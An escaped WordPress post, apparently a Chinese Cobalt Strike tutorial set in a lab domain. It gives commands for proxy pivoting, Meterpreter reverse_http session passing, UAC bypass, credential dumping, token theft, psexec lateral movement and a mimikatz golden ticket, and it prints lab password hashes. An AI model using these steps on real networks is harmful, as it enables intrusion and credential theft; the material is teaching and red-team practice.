\u5148\u628a beacon \u8bbe\u4e3a\u4ea4\u4e92\u6a21\u5f0f\u3002\u56e0\u4e3a\u6d4f\u89c8\u5668\u8df3\u677f\u662f\u901a\u8fc7 beacon \u4f1a\u8bdd\u6765\u96a7\u9053\u901a\u4fe1\u4f20\u8f93\u6570\u636e\u7684\uff0c\u6240\u4ee5 beacon \u8fde\u63a5\u5230\u56e2\u961f\u670d\u52a1\u5668\u7684\u9891\u7387\u4f1a\u5f71\u54cd\u6d4f\u89c8\u5668\u8df3\u677f\u7684\u540c\u6b65\u6027\u3002\u6240\u4ee5\u8981\u628a beacon \u4f1a\u8bdd\u8bbe\u4e3a\u4ea4\u4e92\u6a21\u5f0f\u6765\u5b9e\u73b0\u6700\u597d \u7684\u6548\u679c  <\/p>\n
\u7136\u540e\u8bbe\u7f6e\u6d4f\u89c8\u5668\u8df3\u677f\u4ee3\u7406( agent )\u3002\u8fd9\u4e00\u6b65\u5b9e\u9645\u4e0a\u4f1a\u5b8c\u6210\u4e24\u4e2a\u4efb\u52a1  <\/p>\n
\u5c06 agent \u7a0b\u5e8f\u6ce8\u5165\u53d7\u5bb3\u673a\u5668\u7684 IE \u6d4f\u89c8\u5668\u8fdb\u7a0b <\/p>\n
\u5728\u56e2\u961f\u670d\u52a1\u5668\u7684\u4e00\u4e2a\u7aef\u53e3\u4e0a\u5f00\u542f\u4e00\u4e2a HTTP \u4ee3\u7406\u670d\u52a1\u5668  <\/p>\n
\"1746756016890-ada0a260-386d-4a55-a33e-306853e8c5aa.png\"<\/p>\n
\u5b9e\u9645\u4e0a\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u4e5f\u53ef\u4ee5\u901a\u8fc7 browserpivot \u547d\u4ee4\u6765\u5b9e\u73b0\u3002\u6548\u679c\u662f\u7b49\u540c\u7684\u3002 \u505c\u6b62\u65b9\u5f0f browserpivot stop  <\/p>\n
\u5982\u679c\u76ee\u6807\u4e0a \u767b\u5f55 \u67d0\u4e9b\u7f51\u7ad9 \u901a\u8fc7\u8bbe\u7f6e\u6d4f\u89c8\u5668\u4ee3\u7406\u540e\uff0c\u8bbf\u95ee\u7f51\u7ad9\u5373\u53ef\u767b\u5f55 <\/p>\n
\"1746756029060-11d8a860-c2cb-4c79-b419-c5ff432306cf.png\"<\/p>\n
\u8bbf\u95ee\u76ee\u6807\u7f51\u7ad9 <\/p>\n
\"1746756037666-0b3505b6-e043-4942-bc27-d0ebb29b822f.png\"<\/p>\n
\u4ee3\u7406\u8f6c\u53d1<\/h1>\n
socks\u4ee3\u7406<\/h2>\n
\u4f7f\u7528socks\u4ee3\u7406<\/p>\n
\u5728\u6307\u5b9a\u7aef\u53e3\u4e0a\u542f\u52a8SOCKS4a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u8be5\u670d\u52a1\u5668\u5c06\u901a\u8fc7\u5f53\u524dBeacon\u4e2d\u7ee7\u7f51\u7edc\u8fde\u63a5 teamserver 192.168.0.195 <\/p>\n
12server5 192.168.0.188 10.10.10.139 <\/p>\n
12server4 10.10.10.138 <\/p>\n
\u4f7f\u7528cs\u83b7\u53d612server5\u6743\u9650 \u8bbe\u7f6esocks\u4ee3\u7406 <\/p>\n
\"1746756080754-77c0c223-ae00-4081-9ff7-b51e29ada3a6.png\"<\/p>\n
\u8bbe\u7f6e sudo vi \/etc\/proxychains4.conf  <\/p>\n
socks4 192.168.0.195 1080<\/code><\/pre>\n
proxychain \u8c03\u7528nmap \u626b\u63cf \u76ee\u6807\u673a\u5b50  <\/p>\n
proxychains nmap -sT -Pn 10.10.10.136 -p 445<\/code><\/pre>\n
\"1746756100687-4a86bd1e-0776-4567-8704-d72577a8d293.png\"<\/p>\n
metasploit \u4f7f\u7528\u8fd9\u4e2a\u4ee3\u7406  <\/p>\n
setg Proxies socks4:192.168.0.195:1080 #\u8bbe\u7f6e\u5168\u5c40\u4ee3\u7406\nsetg ReverseAllowProxy true #\u5141\u8bb8\u53cd\u5411\u4ee3\u7406\uff0c\u901a\u8fc7socks\u53cd\u5f39shell\uff0c\u5efa\u7acb\u53cc\u5411\u901a\u9053\u3002(\u63a2\u6d4b\u53ef\u4ee5\u4e0d\n\u8bbe\u7f6e\u6b64\u9879)<\/code><\/pre>\n
\"1746756119448-26313279-cbfb-4685-9d6d-8efabec5e148.png\"<\/p>\n
\u8f6c\u53d1\u4e0a\u7ebf<\/h2>\n
\u8f6c\u53d1\u76d1\u542c\u5668\u53ef\u4ee5\u5229\u7528\u5df2\u653b\u9677\u7684\u673a\u5668\u4f5c\u4e3a\u4ee3\u7406\uff0c\u4e3a\u5176\u4ed6Beacon\u4f1a\u8bdd\u7684\u4e2d\u8f6c\u7f51\u7edc\u6d41\u91cf\uff0c\u5373\u5185\u7f51\u5176\u4ed6\u673a\u5668\u53ef\u901a \u8fc7\u8fde\u63a5\u653b\u9677\u673a\u5668\u4e0a\u7ebf  <\/p>\n
teamserver 192.168.0.195\n12server5 192.168.0.188 10.10.10.139<\/code><\/pre>\n
\u76ee\u6807\u673a\u5b50 10.10.10.136 \u9996\u5148\u65b0\u5efa\u76d1\u542c\u5668 \u76d1\u542c\u5668\u4f7f\u7528\u5f53\u524d\u4f1a\u8bdd  <\/p>\n
\"1746756142514-113a8517-6942-4a9f-9f7a-1d43177d8e94.png\"<\/p>\n
\u63a5\u7740\u751f\u6210\u540e\u95e8 \u9009\u62e9\u8fd9\u4e2arve\u76d1\u542c\u5668   \u572812server4 \u6267\u884cbeacon  <\/p>\n
\"1746756162793-9b24da2f-2a10-45f2-a4ee-b7cce4a7eb07.png\"<\/p>\n
\"1746756167073-32d53bcd-5ac8-44a0-b53c-cec8af8a2b50.png\"<\/p>\n
\u5207\u6362\u89c6\u56fe  <\/p>\n
\"1746756172732-70914354-4493-48e0-96bd-2891eed5db33.png\"<\/p>\n
\u8fd9\u79cd\u65b9\u5f0f\u4e5f\u53ef\u7528\u4e8e\u591a\u5c42\u7f51\u6bb5\u53cd\u5411\u4e0a\u7ebf<\/p>\n
VPN\u90e8\u7f72<\/h2>\n
\u4e3aCovertVPN\u65b0\u5efa\u4e00\u4e2a\u865a\u62df\u673a\u7f51\u5361\u548c\u76d1\u542c\u5668\u3002\u5f53\u90e8\u7f72CovertVPN\u5ba2\u6237\u7aef\u540e\uff0c\u4f60\u5c06\u76f8\u5f53\u4e8e\u5728\u76ee\u6807\u7f51\u7edc\u4e2d\u62e5 \u6709\u4e00\u4e2a\u4e8c\u5c42\u7f51\u7edc\u7684tap\u63a5\u53e3  <\/p>\n
\u65b0\u5efavpn \u9009\u62e9\u7f51\u5361  <\/p>\n
\"1746756196767-5cd64561-f07c-48b4-9407-8e145ac4d910.png\"<\/p>\n
\u5728\u56e2\u961f\u670d\u52a1\u5668\u4e2d\uff0c\u914d\u7f6e\u521a\u521a\u7684 VPN \u63a5\u53e3\uff1a \u5148\u8fde\u63a5\u5230\u521a\u521a\u7684 VPN \u63a5\u53e3\uff0c\u80fd\u627e\u5230\u6b64\u8bbe\u5907  <\/p>\n
\u5728kali\u4e0a sudo ifconfig phear7 10.10.10.0\/24  <\/p>\n
\"1746756207801-9a17b8f7-a293-4e23-9c25-f990557033f1.png\"<\/p>\n
\u5bf9\u5185\u7f5110\u6bb5\u8fdb\u884c\u4ee3\u7801\u626b\u63cf  <\/p>\n
nmap -sT -Pn 10.10.10.136 -p 445<\/code><\/pre>\n
\"1746756221533-fcc08eab-423e-45a5-9a37-7250dde814a1.png\"<\/p>\n
\u56de\u5230 CS \u7684 VPN Interfaces \u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u6570\u636e\u8d70 VPN \u5728\u6536\u53d1<\/p>\n
\"1746756229749-11da862b-cb36-4546-a317-e50e2a999eec.png\"<\/p>\n
\u4f1a\u8bdd<\/h1>\n
Cobalt Strike \u7684 Beacon \u6700\u521d\u662f\u4e00\u4e2a\u7a33\u5b9a\u7684\u751f\u547d\u7ebf\uff0c\u8ba9\u4f60\u53ef\u4ee5\u4fdd\u6301\u5bf9\u53d7\u5bb3\u4e3b\u673a\u7684\u8bbf\u95ee\u6743\u9650\u3002\u4ece\u4e00\u5f00\u59cb\uff0c Beacon \u7684\u4e3b\u8981\u76ee\u7684\u5c31\u662f\u5411\u5176\u4ed6\u7684 Cobalt Strike \u76d1\u542c\u5668\u4f20\u9012\u6743\u9650  <\/p>\n
\u4f7f\u7528 spawn \u547d\u4ee4\u6765\u4e3a\u4e00\u4e2a\u76d1\u542c\u5668\u6d3e\u751f\u4e00\u4e2a\u4f1a\u8bdd\u3002\u6b64 spawn \u547d\u4ee4\u63a5\u53d7\u4e00\u4e2a\u67b6\u6784\uff08\u5982\uff1ax86\uff0cx64\uff09\u548c\u4e00 \u4e2a\u76d1\u542c\u5668\u4f5c\u4e3a\u5176\u53c2\u6570  <\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c spawn \u547d\u4ee4\u4f1a\u5728 rundll32.exe \u4e2d\u6d3e\u751f\u4e00\u4e2a\u4f1a\u8bdd  <\/p>\n
spwan \u4f1a\u753b<\/h2>\n
\u4e5f\u53ef\u4ee5\u4f7f\u7528spwan\u547d\u4ee4 \u6d3e\u751f\u4e00\u4e2a\u4f1a\u8bdd  <\/p>\n
spwan\nbeacon> help spawn\nUse: spawn [x86|x64] [\u76d1\u542c\u5668]\nspawn [\u76d1\u542c\u5668]<\/code><\/pre>\n
\u521b\u5efa\u4e00\u4e2ax86\u6216x64\u5080\u5121\u8fdb\u7a0b\uff0c\u5e76\u6ce8\u5165\u8fd0\u884c\u4ece [\u76d1\u542c\u5668] \u751f\u6210\u7684shellcode  <\/p>\n
\"1746756294316-e484b06e-6fd2-4763-a39d-9f5a626f5b46.png\"<\/p>\n
\u6ce8\u5165\u8fdb\u7a0b\u83b7\u53d6\u4f1a\u8bdd<\/h2>\n
\"1746756305242-66e39725-e1b5-48c3-af0e-eaa063d93afa.png\"<\/p>\n
\"1746756312388-a31c2e40-63fa-44ea-868e-b07e0405ada5.png\"<\/p>\n
cobalt strike\u6d3e\u751f\u4f1a\u8bdd\u5230msf<\/h2>\n
\u5f53Cobaltstrike\u83b7\u53d6\u5230\u4e0a\u7ebf\u4e3b\u673a\u540e,\u6709\u65f6\u5019\u9700\u8981\u4f20\u9012\u4f1a\u8bdd\u5230MSF,\u64cd\u4f5c\u5982\u4e0b  <\/p>\n
\u9996\u5148\u5efa\u7acb\u65b0\u7684Foreign HTTP\u76d1\u542c\u5668,\u8bbe\u7f6eIP\u4e3aMSF\u63a5\u6536\u7684IP,\u8bbe\u7f6ePort\u662f\u4e00\u4f1a\u513fMSF\u76d1\u542c\u7684\u7aef\u53e3  <\/p>\n
msf6 > use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set payload windows\/meterpreter\/reverse_http\npayload => windows\/meterpreter\/reverse_http\nmsf6 exploit(multi\/handler) > set lhost 10.10.10.141\nlhost => 10.10.10.141\nmsf6 exploit(multi\/handler) > set lport 8888\nlport => 8888\nmsf6 exploit(multi\/handler) > run<\/code><\/pre>\n
\u8bbe\u7f6ecs\u76d1\u542c\u5668 <\/p>\n
\"1746756337814-5238c668-1cba-4433-93f2-0b959fba4f3a.png\"<\/p>\n
\u5728beacon\u4f7f\u7528\u547d\u4ee4 spawn msf \u4f1a\u8bdd\u4f1a\u6d3e\u751f\u5230msf\u91cc <\/p>\n
\"1746756347261-ed1cdaf6-2b53-4c9e-bfc8-9dd4e9bfd288.png\"<\/p>\n
msf\u8fd0\u884c\u540e\u4f1a\u6536\u5230\u4f1a\u8bdd  <\/p>\n
metasploit \u6d3e\u751f\u4f1a\u8bdd\u5230cs<\/h2>\n
\u5982\u679cMetasploit\u5df2\u7ecf\u83b7\u53d6\u5230\u4e86\u4e00\u4e2a\u4f1a\u8bdd\uff0c\u53ef\u4ee5\u901a\u8fc7payload_inject\u6a21\u5757\u8fdb\u884c\u4f1a\u8bdd\u6d3e\u751f,\u5c06\u4f1a\u8bdd\u4f20\u9012\u5230 Cobaltstrike  <\/p>\n
\u9996\u5148\u5efa\u7acb\u76d1\u542c\u5668  <\/p>\n
\"1746756374983-a8f695a2-0874-4ee7-b94d-f00734e52041.png\"<\/p>\n
\u5728msf\u79cd\u9009\u62e9 payload_inject \u6a21\u5757 \u8bbe\u7f6e\u53c2\u6570 disablepayloadhandler \u7981\u6b62msf\u76d1\u542c <\/p>\n
use windows\/local\/payload_inject\nset disablepayloadhandler true\nset paylaod windows\/meterpreter\/reverse_http\nset lhost 192.168.0.195\nset lport 9999\nset session 1\nexploit<\/code><\/pre>\n
\"1746756393920-e4a5bdce-c651-4c2a-b936-400d56547b40.png\"<\/p>\n
\u540e\u6e17\u900f<\/h1>\n
\u5728cs\u4e2d\u6709\u4e00\u4e2a\u51ed\u8bc1\u63d0\u6743\u6a21\u5757  <\/p>\n
\u83b7\u53d6hash<\/h2>\n
\"1746756407802-5792169e-40e1-495f-8b01-7eff8e9ad368.png\"<\/p>\n
\u63d0\u6743<\/h2>\n
ms14-058\/ms15-051\/ms16-016\/ms16-032 \u8fd9\u4e9b\u90fd\u662f\u5927\u5bb6\u8033\u719f\u80fd\u8be6\u7684Windows\u672c\u5730\u63d0\u6743\u6f0f\u6d1e\uff0c\u5728\u6b64\u63d2\u4ef6\u4e2d\u90fd\u5df2\u7ecf\u96c6\u6210  <\/p>\n
UAC-DLL <\/p>\n
\u8fd9\u662f\u4e00\u79cd\u7ed5\u8fc7UAC\u7684\u653b\u51fb\uff0c\u5b83\u8bd5\u56fe\u5c06\u672c\u5730\u7ba1\u7406\u5458\u8fd0\u884c\u7684\u6709\u6548\u8d1f\u8f7d\u4ece\u4f4e\u6743\u9650\u63d0\u5347\u5230\u9ad8\u6743\u9650\u3002\u6b64\u653b\u51fb\u4f7f\u7528 UAC\u6f0f\u6d1e\u5c06ArtifactKit\u751f\u6210\u7684DLL\u590d\u5236\u5230\u7279\u6743\u4f4d\u7f6e\u3002\u6b64\u653b\u51fb\u9002\u7528\u4e8eWindows7\u548cWindows8\u53ca\u66f4\u9ad8\u7248\u672c\u7684 \u672a\u4fee\u8865\u7248\u672c  <\/p>\n
uac-token-duplication <\/p>\n
\u8fd9\u662f\u53e6\u4e00\u79cd\u7ed5\u8fc7UAC\u7684\u653b\u51fb\uff0c\u5c06\u5176\u4ece\u4f4e\u6743\u9650\u63d0\u5347\u5230\u9ad8\u6743\u9650\uff08\u4f5c\u4e3a\u672c\u5730\u7ba1\u7406\u5458\uff09\u3002\u8fd9\u79cd\u653b\u51fb\u4f7f\u7528\u4e00\u4e2aUAC \u6f0f\u6d1e\uff0c\u5141\u8bb8\u975e\u63d0\u5347\u8fdb\u7a0b\u4f7f\u7528\u4ece\u63d0\u5347\u8fdb\u7a0b\u4e2d\u7a83\u53d6\u7684\u4ee4\u724c\u542f\u52a8\u4efb\u610f\u8fdb\u7a0b\u3002\u6b64\u6f0f\u6d1e\u8981\u6c42\u653b\u51fb\u5220\u9664\u5206\u914d\u7ed9\u63d0\u5347\u4ee4 \u724c\u7684\u591a\u4e2a\u6743\u9650\u3002\u6b64\u653b\u51fb\u9002\u7528\u4e8eWindows7\u53ca\u66f4\u9ad8\u7248\u672c\u3002\u5982\u679cAlwaysNotify\u5904\u4e8e\u5176\u6700\u9ad8\u8bbe\u7f6e\uff0c\u5219\u6b64\u653b\u51fb\u8981 \u6c42\u63d0\u5347\u7684\u8fdb\u7a0b\u5df2\u5728\u5f53\u524d\u684c\u9762\u4f1a\u8bdd\u4e2d\u8fd0\u884c\uff08\u4f5c\u4e3a\u540c\u4e00\u7528\u6237\uff09,\u6b64\u6f0f\u6d1e\u4f7f\u7528PowerShell\u751f\u6210\u4f1a\u8bdd  <\/p>\n
Uac-eventvwr <\/p>\n
\u8fd9\u79cd\u63d0\u6743\u65b9\u6cd5\u662f\u5229\u7528\u65f6\u95f4\u67e5\u770b\u5668eventvwr\uff0c\u901a\u8fc7\u6ce8\u518c\u8868\u4e4b\u540e\uff0c\u6267\u884cEventvwr.exe\u4f1a\u81ea\u52a8\u52a0\u8f7d\u6211\u4eec\u7684 A.exe(exp),\u8fd9\u4e2a\u65f6\u5019\u4ed6\u7684\u6743\u9650\u5c31\u662f\u9ad8\u4e86\uff0c\u6210\u529f\u7ed5\u8fc7UAV  <\/p>\n
Uac-wscript <\/p>\n
\u8fd9\u79cd\u7ed5\u8fc7uac\u63d0\u6743\u7684\u65b9\u6cd5\u6700\u521d\u662f\u5728Empire\u6846\u67b6\u4e2d\u73b0\u8eab\u7684\uff0c\u8be5\u65b9\u6cd5\u53ea\u9488\u5bf9Windows7\u6709\u6548  <\/p>\n
\u63d0\u6743\u65b9\u5f0f \u5728\u7f51\u4e0a\u627e\u597d\u7684\u63d2\u4ef6\u8fdb\u884c\u63d0\u53d6  <\/p>\n
\"1746756452394-b10b01f0-3504-49d2-9fd0-e080913dfb7d.png\"<\/p>\n
\u83b7\u53d6\u660e\u6587<\/h2>\n
\u4f7f\u7528\u547d\u4ee4 logopasswords\u83b7\u53d6hash \u548c\u660e\u6587  <\/p>\n
\"1746756463257-cfde6c15-46a6-4ab2-84c1-24fcab8baef8.png\"<\/p>\n
\u6a2a\u5411\u6e17\u900f<\/h2>\n
\u6a2a\u5411\u6e17\u900f\u653b\u51fb\u6280\u672f\u662f\u590d\u6742\u7f51\u7edc\u653b\u51fb\u4e2d\u5e7f\u6cdb\u4f7f\u7528\u7684\u4e00\u79cd\u6280\u672f\uff0c\u7279\u522b\u662f\u5728\u9ad8\u7ea7\u6301\u7eed\u5a01\u80c1\uff08Advanced Persistent Threats\uff0cAPT\uff09\u4e2d\u66f4\u52a0\u70ed\u8877\u4e8e\u4f7f\u7528\u8fd9\u79cd\u653b\u51fb\u65b9\u6cd5\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e9b\u6280\u672f\uff0c\u4ee5\u88ab\u653b\u9677\u7684\u7cfb \u7edf\u4e3a\u8df3\u677f\uff0c\u8bbf\u95ee\u5176\u4ed6\u4e3b\u673a\uff0c\u83b7\u53d6\u5305\u62ec\u90ae\u7bb1\u3001\u5171\u4eab\u6587\u4ef6\u5939\u6216\u8005\u51ed\u8bc1\u4fe1\u606f\u5728\u5185\u7684\u654f\u611f\u8d44\u6e90\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528 \u8fd9\u4e9b\u654f\u611f\u4fe1\u606f\uff0c\u8fdb\u4e00\u6b65\u63a7\u5236\u5176\u4ed6\u7cfb\u7edf\u3001\u63d0\u5347\u6743\u9650\u6216\u7a83\u53d6\u66f4\u591a\u6709\u4ef7\u503c\u7684\u51ed\u8bc1\u3002\u501f\u52a9\u6b64\u7c7b\u653b\u51fb\uff0c\u653b\u51fb\u8005\u6700\u7ec8 \u53ef\u80fd\u83b7\u53d6\u57df\u63a7\u7684\u8bbf\u95ee\u6743\u9650\uff0c\u5b8c\u5168\u63a7\u5236\u57fa\u4e8eWindows\u7cfb\u7edf\u7684\u57fa\u7840\u8bbe\u65bd\u6216\u4e0e\u4e1a\u52a1\u76f8\u5173\u7684\u5173\u952e\u8d26\u6237\u3002 \u5728\u63d0\u6743\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u7528mimikatz dump\u76ee\u6807\u673a\u7684\u51ed\u8bc1\uff0c\u5e76\u8fdb\u884c\u5185\u7f51\u6a2a\u5411\u79fb\u52a8  <\/p>\n
\u4f7f\u7528 net view \u5217\u51fa\u4fe1\u4efb\u4e3b\u673a  <\/p>\n
\"1746756484783-4e325c9d-a70f-4fe3-bf52-5bb9cf015621.png\"<\/p>\n
psexec\u6a2a\u79fb<\/h3>\n
\u5728\u6267\u884c\u7aef\u53e3\u626b\u63cf\u540e \u76ee\u6807\u89c6\u56fe\u4e2d\uff0c\u9009\u62e9\u4e00\u4e2a\u76ee\u6807\uff0c\u53f3\u952e\u2013>\u767b\u5f55\u2013psexec\uff0c\u5373\u53ef\u9009\u62e9\u51ed\u8bc1\u8fdb\u884c\u6a2a\u5411\u79fb\u52a8  <\/p>\n
\u53f3\u952e \u6a2a\u5411\u79fb\u52a8 \u9009\u62e9\u5408\u9002\u7684\u6a21\u5757\u8fdb\u884c\u767b\u5f55  <\/p>\n
\"1746756517887-590d7683-162b-42e7-86d3-0df729d07128.png\"<\/p>\n
\"1746756523467-1c18edae-e48c-4d4c-951b-3a975a2e0a8b.png\"<\/p>\n
\u9009\u62e9hash\u8fdb\u884c\u767b\u5f55  <\/p>\n
\"1746756530173-0c2f9ccc-a886-4036-8179-a974b9eb319f.png\"<\/p>\n
\u7a83\u53d6\u4ee4\u724c<\/h3>\n
\u4f7f\u7528\u547d\u4ee4ps \u5bfb\u627e\u8fdb\u7a0b \u63a5\u7740\u547d\u4ee4steal_token pid pid\u662f\u8fdb\u7a0b\u7684id \u9009\u62e9\u5408\u9002\u6743\u9650\u7684\u8fdb\u7a0bid\u5373\u53ef  <\/p>\n
\"1746756541945-3665e657-e86e-46df-b1ab-1539bf4ac0ca.png\"<\/p>\n
\u5982\u679c\u5b58\u5728\u57df\u7ba1 \u4e5f\u53ef\u4ee5\u83b7\u53d6\u57df\u7ba1\u7406\u6743\u9650  <\/p>\n
\"1746756548692-b2fadcd8-97bc-45a1-b46b-f123392628ae.png\"<\/p>\n
\u4f7f\u7528\u547d\u4ee4 rev2self \u8fd4\u56de\u4e4b\u524d\u7684\u6743\u9650<\/p>\n
\u5236\u4f5c\u4ee4\u724c<\/h3>\n
\u4f7f\u7528make_token\u547d\u4ee4 \u5c06\u4e4b\u524d\u83b7\u53d6\u7684 \u751f\u6210\u4e00\u4e2a\u547d\u4ee4\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a \u8fd9\u91cc\u4ee5\u8bbf\u95ee\u57df\u63a7\u4e3a\u4f8b  <\/p>\n
beacon> help make_token\nUse: make_token [\u57df\u7528\u6237\u540d] [\u5bc6\u7801]<\/code><\/pre>\n
\u514b\u9686\u5f53\u524d\u8bbf\u95ee\u4ee4\u724c\uff0c\u5e76\u5728\u8bbf\u95ee\u7f51\u7edc\u8d44\u6e90\u65f6\u8bbe\u7f6e\u4e3a\u6307\u5b9a\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801  <\/p>\n
make_token redteamadministrator QWEasd123<\/code><\/pre>\n
\"1746756577469-d9271759-6024-47f8-bde5-6b91d0bc3b4e.png\"<\/p>\n
\u5236\u4f5c\u9ec4\u91d1\u7968\u636e<\/h3>\n
\u539f\u7406 <\/p>\n
\u9ec4\u91d1\u7968\u636e\u7684\u539f\u7406\u5c31\u662f\u7528krbtgt\u7684hash\u6765\u4f2a\u9020TGT\u7684\u5185\u5bb9\u3002\u66f4\u6539\u91cc\u9762\u7684client\u53c2\u6570\u4e0esession key\u7b49\u3002\u8ba9TGS \u4ee5\u4e3a\u6211\u5c31\u662f\u90a3\u4e2a\u6211\u6240\u58f0\u79f0\u7684\u4eba\uff0c\u5f53\u7136\u6211\u4e00\u822c\u4f1a\u58f0\u79f0\u81ea\u5df1\u662fadministrator\u3002\u7b2c\u56db\u6b65\u4e3b\u8981\u662f\u6765\u9a8c\u8bc1\u5ba2\u6237\u7aef\u7684 \u8eab\u4efd\u3002 <\/p>\n
\u6240\u8c13\u7684\u9ec4\u91d1\u7968\u636e\u5176\u5b9e\u5c31\u662fkerberos\u8ba4\u8bc1\u7684\u7b2c\u4e8c\u4e2a\u9636\u6bb5\u4e2d\u7684tgs\u7684ticket\u4e5f\u5c31\u662fTGT\u3002\u8fd9\u4e2aticket\u76f8\u5f53\u4e8e\u5bf9\u8bf7 \u6c42\u7aef\u7684\u4e00\u4e2a\u8eab\u4efd\u8ba4\u8bc1\u7684\u51ed\u636e\uff0c\u5982\u679c\u53ef\u4ee5\u4f2a\u9020\u8fd9\u4e2aticket\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4f2a\u9020\u4efb\u610f\u8eab\u4efd\uff0c\u800c\u9ec4\u91d1\u7968\u636e\u5c31\u662f\u4e00\u4e2a \u5b9e\u73b0\u65b9\u5f0f\u3002  <\/p>\n
\u9996\u5148\u4f7f\u7528\u547d\u4ee4\u83b7\u53d6 jump psexec64 ad01 smb \u83b7\u53d6ad01\u7684\u6743\u9650 \u5f97\u5230\u6743\u9650\u540e \u547d\u4ee4 hashdump\u5bfc\u51fa\u6240\u6709 hash  <\/p>\n
\"1746756601491-7edccf06-20c8-46e6-b3b1-929fd815b5c8.png\"<\/p>\n
Administrator:500:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962\n387:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:689fe33346a9e9fe229395fb36178ecb:::<\/code><\/pre>\n
\u57dfsid S-1-5-21-2536581826-3274276096-3456299113 \u57df\u666e\u901a\u7528\u6237 \u547d\u4ee4 whoai \/user \u53bb\u6389\u540e\u4e09\u4f4d  <\/p>\n
\"1746756613284-d7c6bc73-7102-456f-8e78-e9500559ca0a.png\"<\/p>\n
mimikatz kerberos::golden \/user:Administrator \/domain:redteam.club \/sid:S-1-5-\n21-2536581826-3274276096-3456299113 \/krbtgt:689fe33346a9e9fe229395fb36178ecb\n\/endin:480 \/renewmax:10080 \/ptt<\/code><\/pre>\n
\u8bbf\u95ee ad01 shell dir ad01c$  <\/p>\n
\"1746756625499-9f5e4ed1-a880-4567-81b9-e87fcae0626a.png\"<\/p>\n
\u83b7\u53d6dc\u6743\u9650 ump psexec ad01 smb  <\/p>\n
\"1746756632236-22a9eb28-ba7c-497f-bda5-043efd6e1c72.png\"<\/p>\n
\n
\u66f4\u65b0: 2025-05-09 19:25:51
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/wwyzwxx8mfim9yhg<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
CS\uff08Cobalt Strike\uff09 \u4ecb\u7ecd CS \u5565\u4e00\u6b3e\u57fa\u4e8e Java \u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5206\u4e3a\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\uff0c\u5ba2\u6237\u7aef\u6709\u591a\u4e2a\uff0c\u9002\u5408\u56e2\u961f\u534f\u540c\u4f5c\u6218\uff0c\u591a\u4e2a\u653b\u51fb\u8005\u53ef\u4ee5\u540c\u4e8b\u8fde\u63a5\u4e00\u4e2a\u56e2\u961f\u670d\u52a1\u5668\u5171\u4eab\u653b\u51fb\u8d44\u6e90\u4e0e\u76ee\u6807\u4fe1\u606f\u548c session\uff0c\u6a21\u62df APT \u505a\u6a21\u62df\u5bf9\u6297\uff0c\u8fdb\u884c\u5185\u7f51\u6e17\u900f CS \u96c6\u6210\u7aef\u53e3\u8f6c\u53d1\uff0c\u670d\u52a1\u626b\u63cf\uff0c\u81ea\u52a8\u5316\u6ea2\u51fa\uff0c\u591a\u6a21\u5f0f\u7aef\u53e3\u76d1\u542c\uff0cwin exe \u6728\u9a6c\u751f\u6210 win dll \u6728\u9a6c\u751f\u6210 java \u6728\u9a6c\u751f\u6210 office  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[121,119,2],"tags":[12,22,28,29,32],"class_list":["post-719","post","type-post","status-publish","format-standard","hentry","category-ceshigongju","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-windows","tag-kali","tag-java","tag-install"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/719","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=719"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/719\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=719"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=719"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}